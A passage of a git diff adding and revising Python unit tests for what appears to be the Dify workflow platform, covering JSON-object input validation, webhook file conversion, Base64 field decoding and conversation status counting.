-65,7 +68,7 @@ def test_json_object_valid_schema(): ) ] - user_inputs = {"profile": {"age": 20, "name": "Tom"}} + user_inputs = {"profile": json.dumps({"age": 20, "name": "Tom"})} node = make_start_node(user_inputs, variables) result = node._run() @@ -74,12 +77,23 @@ def test_json_object_valid_schema(): def test_json_object_invalid_json_string(): + schema = json.dumps( + { + "type": "object", + "properties": { + "age": {"type": "number"}, + "name": {"type": "string"}, + }, + "required": ["age", "name"], + } + ) variables = [ VariableEntity( variable="profile", label="profile", type=VariableEntityType.JSON_OBJECT, required=True, + json_schema=schema, ) ] @@ -88,38 +102,21 @@ def test_json_object_invalid_json_string(): node = make_start_node(user_inputs, variables) - with pytest.raises(ValueError, match="profile must be a JSON object"): - node._run() - - -@pytest.mark.parametrize("value", ["[1, 2, 3]", "123"]) -def test_json_object_valid_json_but_not_object(value): - variables = [ - VariableEntity( - variable="profile", - label="profile", - type=VariableEntityType.JSON_OBJECT, - required=True, - ) - ] - - user_inputs = {"profile": value} - - node = make_start_node(user_inputs, variables) - - with pytest.raises(ValueError, match="profile must be a JSON object"): + with pytest.raises(ValueError, match='{"age": 20, "name": "Tom" must be a valid JSON object'): node._run() def test_json_object_does_not_match_schema(): - schema = { - "type": "object", - "properties": { - "age": {"type": "number"}, - "name": {"type": "string"}, - }, - "required": ["age", "name"], - } + schema = json.dumps( + { + "type": "object", + "properties": { + "age": {"type": "number"}, + "name": {"type": "string"}, + }, + "required": ["age", "name"], + } + ) variables = [ VariableEntity( @@ -132,7 +129,7 @@ def test_json_object_does_not_match_schema(): ] # age is a string, which violates the schema (expects number) - user_inputs = {"profile": {"age": "twenty", "name": "Tom"}} + user_inputs = {"profile": json.dumps({"age": "twenty", "name": "Tom"})} node = make_start_node(user_inputs, variables) @@ -141,14 +138,16 @@ def test_json_object_does_not_match_schema(): def test_json_object_missing_required_schema_field(): - schema = { - "type": "object", - "properties": { - "age": {"type": "number"}, - "name": {"type": "string"}, - }, - "required": ["age", "name"], - } + schema = json.dumps( + { + "type": "object", + "properties": { + "age": {"type": "number"}, + "name": {"type": "string"}, + }, + "required": ["age", "name"], + } + ) variables = [ VariableEntity( @@ -161,7 +160,7 @@ def test_json_object_missing_required_schema_field(): ] # Missing required field "name" - user_inputs = {"profile": {"age": 20}} + user_inputs = {"profile": json.dumps({"age": 20})} node = make_start_node(user_inputs, variables) @@ -214,7 +213,7 @@ def test_json_object_optional_variable_not_provided(): variable="profile", label="profile", type=VariableEntityType.JSON_OBJECT, - required=False, + required=True, ) ] @@ -223,5 +222,5 @@ def test_json_object_optional_variable_not_provided(): node = make_start_node(user_inputs, variables) # Current implementation raises a validation error even when the variable is optional - with pytest.raises(ValueError, match="profile must be a JSON object"): + with pytest.raises(ValueError, match="profile is required in input form"): node._run() diff --git a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py new 
file mode 100644 index 0000000000..ead2334473 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py @@ -0,0 +1,452 @@ +""" +Unit tests for webhook file conversion fix. + +This test verifies that webhook trigger nodes properly convert file dictionaries +to FileVariable objects, fixing the "Invalid variable type: ObjectVariable" error +when passing files to downstream LLM nodes. +""" + +from unittest.mock import Mock, patch + +from core.app.entities.app_invoke_entities import InvokeFrom +from core.workflow.entities.graph_init_params import GraphInitParams +from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus +from core.workflow.nodes.trigger_webhook.entities import ( + ContentType, + Method, + WebhookBodyParameter, + WebhookData, +) +from core.workflow.nodes.trigger_webhook.node import TriggerWebhookNode +from core.workflow.runtime.graph_runtime_state import GraphRuntimeState +from core.workflow.runtime.variable_pool import VariablePool +from core.workflow.system_variable import SystemVariable +from models.enums import UserFrom +from models.workflow import WorkflowType + + +def create_webhook_node( + webhook_data: WebhookData, + variable_pool: VariablePool, + tenant_id: str = "test-tenant", +) -> TriggerWebhookNode: + """Helper function to create a webhook node with proper initialization.""" + node_config = { + "id": "webhook-node-1", + "data": webhook_data.model_dump(), + } + + graph_init_params = GraphInitParams( + tenant_id=tenant_id, + app_id="test-app", + workflow_type=WorkflowType.WORKFLOW, + workflow_id="test-workflow", + graph_config={}, + user_id="test-user", + user_from=UserFrom.ACCOUNT, + invoke_from=InvokeFrom.SERVICE_API, + call_depth=0, + ) + + runtime_state = GraphRuntimeState( + variable_pool=variable_pool, + start_at=0, + ) + + node = TriggerWebhookNode( + id="webhook-node-1", + config=node_config, + graph_init_params=graph_init_params, + graph_runtime_state=runtime_state, + ) + + # Attach a lightweight app_config onto runtime state for tenant lookups + runtime_state.app_config = Mock() + runtime_state.app_config.tenant_id = tenant_id + + # Provide compatibility alias expected by node implementation + # Some nodes reference `self.node_id`; expose it as an alias to `self.id` for tests + node.node_id = node.id + + return node + + +def create_test_file_dict( + filename: str = "test.jpg", + file_type: str = "image", + transfer_method: str = "local_file", +) -> dict: + """Create a test file dictionary as it would come from webhook service.""" + return { + "id": "file-123", + "tenant_id": "test-tenant", + "type": file_type, + "filename": filename, + "extension": ".jpg", + "mime_type": "image/jpeg", + "transfer_method": transfer_method, + "related_id": "related-123", + "storage_key": "storage-key-123", + "size": 1024, + "url": "https://example.com/test.jpg", + "created_at": 1234567890, + "used_at": None, + "hash": "file-hash-123", + } + + +def test_webhook_node_file_conversion_to_file_variable(): + """Test that webhook node converts file dictionaries to FileVariable objects.""" + # Create test file dictionary (as it comes from webhook service) + file_dict = create_test_file_dict("uploaded_image.jpg") + + data = WebhookData( + title="Test Webhook with File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="image_upload", type="file", required=True), + WebhookBodyParameter(name="message", type="string", required=False), + ], + ) + + variable_pool = 
VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {"message": "Test message"}, + "files": { + "image_upload": file_dict, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Mock the file factory and variable factory + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks + mock_file_obj = Mock() + mock_file_obj.to_dict.return_value = file_dict + mock_file_factory.return_value = mock_file_obj + + mock_segment = Mock() + mock_segment.value = mock_file_obj + mock_segment_factory.return_value = mock_segment + + mock_file_var_instance = Mock() + mock_file_variable.return_value = mock_file_var_instance + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify file factory was called with correct parameters + mock_file_factory.assert_called_once_with( + mapping=file_dict, + tenant_id="test-tenant", + ) + + # Verify segment factory was called to create FileSegment + mock_segment_factory.assert_called_once() + + # Verify FileVariable was created with correct parameters + mock_file_variable.assert_called_once() + call_args = mock_file_variable.call_args[1] + assert call_args["name"] == "image_upload" + # value should be whatever build_segment_with_type.value returned + assert call_args["value"] == mock_segment.value + assert call_args["selector"] == ["webhook-node-1", "image_upload"] + + # Verify output contains the FileVariable, not the original dict + assert result.outputs["image_upload"] == mock_file_var_instance + assert result.outputs["message"] == "Test message" + + +def test_webhook_node_file_conversion_with_missing_files(): + """Test webhook node file conversion with missing file parameter.""" + data = WebhookData( + title="Test Webhook with Missing File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="missing_file", type="file", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": {}, # No files + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle None case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify missing file parameter is None + assert result.outputs["_webhook_raw"]["files"] == {} + + +def test_webhook_node_file_conversion_with_none_file(): + """Test webhook node file conversion with None file value.""" + data = WebhookData( + title="Test Webhook with None File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="none_file", type="file", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": None, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle None case gracefully) + result = node._run() + + # Verify successful 
execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify None file parameter is None + assert result.outputs["_webhook_raw"]["files"]["file"] is None + + +def test_webhook_node_file_conversion_with_non_dict_file(): + """Test webhook node file conversion with non-dict file value.""" + data = WebhookData( + title="Test Webhook with Non-Dict File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="wrong_type", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": "not_a_dict", # Wrapped to match node expectation + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Run the node without patches (should handle non-dict case gracefully) + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify fallback to original (wrapped) mapping + assert result.outputs["_webhook_raw"]["files"]["file"] == "not_a_dict" + + +def test_webhook_node_file_conversion_mixed_parameters(): + """Test webhook node with mixed parameter types including files.""" + file_dict = create_test_file_dict("mixed_test.jpg") + + data = WebhookData( + title="Test Webhook Mixed Parameters", + method=Method.POST, + content_type=ContentType.FORM_DATA, + headers=[], + params=[], + body=[ + WebhookBodyParameter(name="text_param", type="string", required=True), + WebhookBodyParameter(name="number_param", type="number", required=False), + WebhookBodyParameter(name="file_param", type="file", required=True), + WebhookBodyParameter(name="bool_param", type="boolean", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": { + "text_param": "Hello World", + "number_param": 42, + "bool_param": True, + }, + "files": { + "file_param": file_dict, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks for file + mock_file_obj = Mock() + mock_file_factory.return_value = mock_file_obj + + mock_segment = Mock() + mock_segment.value = mock_file_obj + mock_segment_factory.return_value = mock_segment + + mock_file_var = Mock() + mock_file_variable.return_value = mock_file_var + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify all parameters are present + assert result.outputs["text_param"] == "Hello World" + assert result.outputs["number_param"] == 42 + assert result.outputs["bool_param"] is True + assert result.outputs["file_param"] == mock_file_var + + # Verify file conversion was called + mock_file_factory.assert_called_once_with( + mapping=file_dict, + tenant_id="test-tenant", + ) + + +def test_webhook_node_different_file_types(): + """Test webhook node file conversion with different file types.""" + image_dict = create_test_file_dict("image.jpg", "image") + + data = WebhookData( + title="Test Webhook Different File Types", + method=Method.POST, + 
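+        # multipart/form-data is the content type under which webhook file
+        # uploads arrive, here carrying three different file kinds at once.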
content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="image", type="file", required=True), + WebhookBodyParameter(name="document", type="file", required=True), + WebhookBodyParameter(name="video", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "image": image_dict, + "document": create_test_file_dict("document.pdf", "document"), + "video": create_test_file_dict("video.mp4", "video"), + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks for all files + mock_file_objs = [Mock() for _ in range(3)] + mock_segments = [Mock() for _ in range(3)] + mock_file_vars = [Mock() for _ in range(3)] + + # Map each segment.value to its corresponding mock file obj + for seg, f in zip(mock_segments, mock_file_objs): + seg.value = f + + mock_file_factory.side_effect = mock_file_objs + mock_segment_factory.side_effect = mock_segments + mock_file_variable.side_effect = mock_file_vars + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify all file types were converted + assert mock_file_factory.call_count == 3 + assert result.outputs["image"] == mock_file_vars[0] + assert result.outputs["document"] == mock_file_vars[1] + assert result.outputs["video"] == mock_file_vars[2] + + +def test_webhook_node_file_conversion_with_non_dict_wrapper(): + """Test webhook node file conversion when the file wrapper is not a dict.""" + data = WebhookData( + title="Test Webhook with Non-dict File Wrapper", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="non_dict_wrapper", type="file", required=True), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {}, + "files": { + "file": "just a string", + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + result = node._run() + + # Verify successful execution (should not crash) + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + # Verify fallback to original value + assert result.outputs["_webhook_raw"]["files"]["file"] == "just a string" diff --git a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py index a599d4f831..bbb5511923 100644 --- a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py +++ b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py @@ -1,8 +1,10 @@ +from unittest.mock import patch + import pytest from core.app.entities.app_invoke_entities import InvokeFrom from core.file import File, FileTransferMethod, FileType -from core.variables import StringVariable +from core.variables import FileVariable, StringVariable from core.workflow.entities.graph_init_params import GraphInitParams from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus from core.workflow.nodes.trigger_webhook.entities import ( @@ -27,26 +29,34 @@ def 
create_webhook_node(webhook_data: WebhookData, variable_pool: VariablePool) "data": webhook_data.model_dump(), } + graph_init_params = GraphInitParams( + tenant_id="1", + app_id="1", + workflow_type=WorkflowType.WORKFLOW, + workflow_id="1", + graph_config={}, + user_id="1", + user_from=UserFrom.ACCOUNT, + invoke_from=InvokeFrom.SERVICE_API, + call_depth=0, + ) + runtime_state = GraphRuntimeState( + variable_pool=variable_pool, + start_at=0, + ) node = TriggerWebhookNode( id="1", config=node_config, - graph_init_params=GraphInitParams( - tenant_id="1", - app_id="1", - workflow_type=WorkflowType.WORKFLOW, - workflow_id="1", - graph_config={}, - user_id="1", - user_from=UserFrom.ACCOUNT, - invoke_from=InvokeFrom.SERVICE_API, - call_depth=0, - ), - graph_runtime_state=GraphRuntimeState( - variable_pool=variable_pool, - start_at=0, - ), + graph_init_params=graph_init_params, + graph_runtime_state=runtime_state, ) + # Provide tenant_id for conversion path + runtime_state.app_config = type("_AppCfg", (), {"tenant_id": "1"})() + + # Compatibility alias for some nodes referencing `self.node_id` + node.node_id = node.id + return node @@ -246,20 +256,27 @@ def test_webhook_node_run_with_file_params(): "query_params": {}, "body": {}, "files": { - "upload": file1, - "document": file2, + "upload": file1.to_dict(), + "document": file2.to_dict(), }, } }, ) node = create_webhook_node(data, variable_pool) - result = node._run() + # Mock the file factory to avoid DB-dependent validation on upload_file_id + with patch("factories.file_factory.build_from_mapping") as mock_file_factory: + + def _to_file(mapping, tenant_id, config=None, strict_type_validation=False): + return File.model_validate(mapping) + + mock_file_factory.side_effect = _to_file + result = node._run() assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED - assert result.outputs["upload"] == file1 - assert result.outputs["document"] == file2 - assert result.outputs["missing_file"] is None + assert isinstance(result.outputs["upload"], FileVariable) + assert isinstance(result.outputs["document"], FileVariable) + assert result.outputs["upload"].value.filename == "image.jpg" def test_webhook_node_run_mixed_parameters(): @@ -291,19 +308,27 @@ def test_webhook_node_run_mixed_parameters(): "headers": {"Authorization": "Bearer token"}, "query_params": {"version": "v1"}, "body": {"message": "Test message"}, - "files": {"upload": file_obj}, + "files": {"upload": file_obj.to_dict()}, } }, ) node = create_webhook_node(data, variable_pool) - result = node._run() + # Mock the file factory to avoid DB-dependent validation on upload_file_id + with patch("factories.file_factory.build_from_mapping") as mock_file_factory: + + def _to_file(mapping, tenant_id, config=None, strict_type_validation=False): + return File.model_validate(mapping) + + mock_file_factory.side_effect = _to_file + result = node._run() assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED assert result.outputs["Authorization"] == "Bearer token" assert result.outputs["version"] == "v1" assert result.outputs["message"] == "Test message" - assert result.outputs["upload"] == file_obj + assert isinstance(result.outputs["upload"], FileVariable) + assert result.outputs["upload"].value.filename == "test.jpg" assert "_webhook_raw" in result.outputs diff --git a/api/tests/unit_tests/core/workflow/test_workflow_entry.py b/api/tests/unit_tests/core/workflow/test_workflow_entry.py index 75de5c455f..68d6c109e8 100644 --- a/api/tests/unit_tests/core/workflow/test_workflow_entry.py +++ 
b/api/tests/unit_tests/core/workflow/test_workflow_entry.py @@ -1,3 +1,5 @@ +from types import SimpleNamespace + import pytest from core.file.enums import FileType @@ -12,6 +14,36 @@ from core.workflow.system_variable import SystemVariable from core.workflow.workflow_entry import WorkflowEntry +@pytest.fixture(autouse=True) +def _mock_ssrf_head(monkeypatch): + """Avoid any real network requests during tests. + + file_factory._get_remote_file_info() uses ssrf_proxy.head to inspect + remote files. We stub it to return a minimal response object with + headers so filename/mime/size can be derived deterministically. + """ + + def fake_head(url, *args, **kwargs): + # choose a content-type by file suffix for determinism + if url.endswith(".pdf"): + ctype = "application/pdf" + elif url.endswith(".jpg") or url.endswith(".jpeg"): + ctype = "image/jpeg" + elif url.endswith(".png"): + ctype = "image/png" + else: + ctype = "application/octet-stream" + filename = url.split("/")[-1] or "file.bin" + headers = { + "Content-Type": ctype, + "Content-Disposition": f'attachment; filename="{filename}"', + "Content-Length": "12345", + } + return SimpleNamespace(status_code=200, headers=headers) + + monkeypatch.setattr("core.helper.ssrf_proxy.head", fake_head) + + class TestWorkflowEntry: """Test WorkflowEntry class methods.""" diff --git a/api/tests/unit_tests/libs/test_encryption.py b/api/tests/unit_tests/libs/test_encryption.py new file mode 100644 index 0000000000..bf013c4bae --- /dev/null +++ b/api/tests/unit_tests/libs/test_encryption.py @@ -0,0 +1,150 @@ +""" +Unit tests for field encoding/decoding utilities. + +These tests verify Base64 encoding/decoding functionality and +proper error handling and fallback behavior. +""" + +import base64 + +from libs.encryption import FieldEncryption + + +class TestDecodeField: + """Test cases for field decoding functionality.""" + + def test_decode_valid_base64(self): + """Test decoding a valid Base64 encoded string.""" + plaintext = "password123" + encoded = base64.b64encode(plaintext.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_field(encoded) + assert result == plaintext + + def test_decode_non_base64_returns_none(self): + """Test that non-base64 input returns None.""" + non_base64 = "plain-password-!@#" + result = FieldEncryption.decrypt_field(non_base64) + # Should return None (decoding failed) + assert result is None + + def test_decode_unicode_text(self): + """Test decoding Base64 encoded Unicode text.""" + plaintext = "密码Test123" + encoded = base64.b64encode(plaintext.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_field(encoded) + assert result == plaintext + + def test_decode_empty_string(self): + """Test decoding an empty string returns empty string.""" + result = FieldEncryption.decrypt_field("") + # Empty string base64 decodes to empty string + assert result == "" + + def test_decode_special_characters(self): + """Test decoding with special characters.""" + plaintext = "P@ssw0rd!#$%^&*()" + encoded = base64.b64encode(plaintext.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_field(encoded) + assert result == plaintext + + +class TestDecodePassword: + """Test cases for password decoding.""" + + def test_decode_password_base64(self): + """Test decoding a Base64 encoded password.""" + password = "SecureP@ssw0rd!" 
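+        # b64encode returns bytes; .decode() yields the ASCII string a
+        # client would actually submit.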
+ encoded = base64.b64encode(password.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_password(encoded) + assert result == password + + def test_decode_password_invalid_returns_none(self): + """Test that invalid base64 passwords return None.""" + invalid = "PlainPassword!@#" + result = FieldEncryption.decrypt_password(invalid) + # Should return None (decoding failed) + assert result is None + + +class TestDecodeVerificationCode: + """Test cases for verification code decoding.""" + + def test_decode_code_base64(self): + """Test decoding a Base64 encoded verification code.""" + code = "789012" + encoded = base64.b64encode(code.encode("utf-8")).decode() + + result = FieldEncryption.decrypt_verification_code(encoded) + assert result == code + + def test_decode_code_invalid_returns_none(self): + """Test that invalid base64 codes return None.""" + invalid = "123456" # Plain 6-digit code, not base64 + result = FieldEncryption.decrypt_verification_code(invalid) + # Should return None (decoding failed) + assert result is None + + +class TestRoundTripEncodingDecoding: + """ + Integration tests for complete encoding-decoding cycle. + These tests simulate the full frontend-to-backend flow using Base64. + """ + + def test_roundtrip_password(self): + """Test encoding and decoding a password.""" + original_password = "SecureP@ssw0rd!" + + # Simulate frontend encoding (Base64) + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + + # Backend decoding + decoded = FieldEncryption.decrypt_password(encoded) + + assert decoded == original_password + + def test_roundtrip_verification_code(self): + """Test encoding and decoding a verification code.""" + original_code = "123456" + + # Simulate frontend encoding + encoded = base64.b64encode(original_code.encode("utf-8")).decode() + + # Backend decoding + decoded = FieldEncryption.decrypt_verification_code(encoded) + + assert decoded == original_code + + def test_roundtrip_unicode_password(self): + """Test encoding and decoding password with Unicode characters.""" + original_password = "密码Test123!@#" + + # Frontend encoding + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + + # Backend decoding + decoded = FieldEncryption.decrypt_password(encoded) + + assert decoded == original_password + + def test_roundtrip_long_password(self): + """Test encoding and decoding a long password.""" + original_password = "ThisIsAVeryLongPasswordWithLotsOfCharacters123!@#$%^&*()" + + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + decoded = FieldEncryption.decrypt_password(encoded) + + assert decoded == original_password + + def test_roundtrip_with_whitespace(self): + """Test encoding and decoding with whitespace.""" + original_password = "pass word with spaces" + + encoded = base64.b64encode(original_password.encode("utf-8")).decode() + decoded = FieldEncryption.decrypt_field(encoded) + + assert decoded == original_password diff --git a/api/tests/unit_tests/models/test_app_models.py b/api/tests/unit_tests/models/test_app_models.py index 268ba1282a..e35788660d 100644 --- a/api/tests/unit_tests/models/test_app_models.py +++ b/api/tests/unit_tests/models/test_app_models.py @@ -1149,3 +1149,258 @@ class TestModelIntegration: # Assert assert site.app_id == app.id assert app.enable_site is True + + +class TestConversationStatusCount: + """Test suite for Conversation.status_count property N+1 query fix.""" + + def test_status_count_no_messages(self): + """Test status_count returns None when conversation has 
no messages.""" + # Arrange + conversation = Conversation( + app_id=str(uuid4()), + mode=AppMode.CHAT, + name="Test Conversation", + status="normal", + from_source="api", + ) + conversation.id = str(uuid4()) + + # Mock the database query to return no messages + with patch("models.model.db.session.scalars") as mock_scalars: + mock_scalars.return_value.all.return_value = [] + + # Act + result = conversation.status_count + + # Assert + assert result is None + + def test_status_count_messages_without_workflow_runs(self): + """Test status_count when messages have no workflow_run_id.""" + # Arrange + app_id = str(uuid4()) + conversation_id = str(uuid4()) + + conversation = Conversation( + app_id=app_id, + mode=AppMode.CHAT, + name="Test Conversation", + status="normal", + from_source="api", + ) + conversation.id = conversation_id + + # Mock the database query to return no messages with workflow_run_id + with patch("models.model.db.session.scalars") as mock_scalars: + mock_scalars.return_value.all.return_value = [] + + # Act + result = conversation.status_count + + # Assert + assert result is None + + def test_status_count_batch_loading_implementation(self): + """Test that status_count uses batch loading instead of N+1 queries.""" + # Arrange + from core.workflow.enums import WorkflowExecutionStatus + + app_id = str(uuid4()) + conversation_id = str(uuid4()) + + # Create workflow run IDs + workflow_run_id_1 = str(uuid4()) + workflow_run_id_2 = str(uuid4()) + workflow_run_id_3 = str(uuid4()) + + conversation = Conversation( + app_id=app_id, + mode=AppMode.CHAT, + name="Test Conversation", + status="normal", + from_source="api", + ) + conversation.id = conversation_id + + # Mock messages with workflow_run_id + mock_messages = [ + MagicMock( + conversation_id=conversation_id, + workflow_run_id=workflow_run_id_1, + ), + MagicMock( + conversation_id=conversation_id, + workflow_run_id=workflow_run_id_2, + ), + MagicMock( + conversation_id=conversation_id, + workflow_run_id=workflow_run_id_3, + ), + ] + + # Mock workflow runs with different statuses + mock_workflow_runs = [ + MagicMock( + id=workflow_run_id_1, + status=WorkflowExecutionStatus.SUCCEEDED.value, + app_id=app_id, + ), + MagicMock( + id=workflow_run_id_2, + status=WorkflowExecutionStatus.FAILED.value, + app_id=app_id, + ), + MagicMock( + id=workflow_run_id_3, + status=WorkflowExecutionStatus.PARTIAL_SUCCEEDED.value, + app_id=app_id, + ), + ] + + # Track database calls + calls_made = [] + + def mock_scalars(query): + calls_made.append(str(query)) + mock_result = MagicMock() + + # Return messages for the first query (messages with workflow_run_id) + if "messages" in str(query) and "conversation_id" in str(query): + mock_result.all.return_value = mock_messages + # Return workflow runs for the batch query + elif "workflow_runs" in str(query): + mock_result.all.return_value = mock_workflow_runs + else: + mock_result.all.return_value = [] + + return mock_result + + # Act & Assert + with patch("models.model.db.session.scalars", side_effect=mock_scalars): + result = conversation.status_count + + # Verify only 2 database queries were made (not N+1) + assert len(calls_made) == 2, f"Expected 2 queries, got {len(calls_made)}: {calls_made}" + + # Verify the first query gets messages + assert "messages" in calls_made[0] + assert "conversation_id" in calls_made[0] + + # Verify the second query batch loads workflow runs with proper filtering + assert "workflow_runs" in calls_made[1] + assert "app_id" in calls_made[1] # Security filter applied + assert "IN" 
in calls_made[1] # Batch loading with IN clause + + # Verify correct status counts + assert result["success"] == 1 # One SUCCEEDED + assert result["failed"] == 1 # One FAILED + assert result["partial_success"] == 1 # One PARTIAL_SUCCEEDED + + def test_status_count_app_id_filtering(self): + """Test that status_count filters workflow runs by app_id for security.""" + # Arrange + app_id = str(uuid4()) + other_app_id = str(uuid4()) + conversation_id = str(uuid4()) + workflow_run_id = str(uuid4()) + + conversation = Conversation( + app_id=app_id, + mode=AppMode.CHAT, + name="Test Conversation", + status="normal", + from_source="api", + ) + conversation.id = conversation_id + + # Mock message with workflow_run_id + mock_messages = [ + MagicMock( + conversation_id=conversation_id, + workflow_run_id=workflow_run_id, + ), + ] + + calls_made = [] + + def mock_scalars(query): + calls_made.append(str(query)) + mock_result = MagicMock() + + if "messages" in str(query): + mock_result.all.return_value = mock_messages + elif "workflow_runs" in str(query): + # Return empty list because no workflow run matches the correct app_id + mock_result.all.return_value = [] # Workflow run filtered out by app_id + else: + mock_result.all.return_value = [] + + return mock_result + + # Act + with patch("models.model.db.session.scalars", side_effect=mock_scalars): + result = conversation.status_count + + # Assert - query should include app_id filter + workflow_query = calls_made[1] + assert "app_id" in workflow_query + + # Since workflow run has wrong app_id, it shouldn't be included in counts + assert result["success"] == 0 + assert result["failed"] == 0 + assert result["partial_success"] == 0 + + def test_status_count_handles_invalid_workflow_status(self): + """Test that status_count gracefully handles invalid workflow status values.""" + # Arrange + app_id = str(uuid4()) + conversation_id = str(uuid4()) + workflow_run_id = str(uuid4()) + + conversation = Conversation( + app_id=app_id, + mode=AppMode.CHAT, + name="Test Conversation", + status="normal", + from_source="api", + ) + conversation.id = conversation_id + + mock_messages = [ + MagicMock( + conversation_id=conversation_id, + workflow_run_id=workflow_run_id, + ), + ] + + # Mock workflow run with invalid status + mock_workflow_runs = [ + MagicMock( + id=workflow_run_id, + status="invalid_status", # Invalid status that should raise ValueError + app_id=app_id, + ), + ] + + with patch("models.model.db.session.scalars") as mock_scalars: + # Mock the messages query + def mock_scalars_side_effect(query): + mock_result = MagicMock() + if "messages" in str(query): + mock_result.all.return_value = mock_messages + elif "workflow_runs" in str(query): + mock_result.all.return_value = mock_workflow_runs + else: + mock_result.all.return_value = [] + return mock_result + + mock_scalars.side_effect = mock_scalars_side_effect + + # Act - should not raise exception + result = conversation.status_count + + # Assert - should handle invalid status gracefully + assert result["success"] == 0 + assert result["failed"] == 0 + assert result["partial_success"] == 0 diff --git a/api/tests/unit_tests/oss/__mock/base.py b/api/tests/unit_tests/oss/__mock/base.py index 974c462289..5bde461d94 100644 --- a/api/tests/unit_tests/oss/__mock/base.py +++ b/api/tests/unit_tests/oss/__mock/base.py @@ -14,7 +14,9 @@ def get_example_bucket() -> str: def get_opendal_bucket() -> str: - return "./dify" + import os + + return os.environ.get("OPENDAL_FS_ROOT", "/tmp/dify-storage") def get_example_filename() -> 
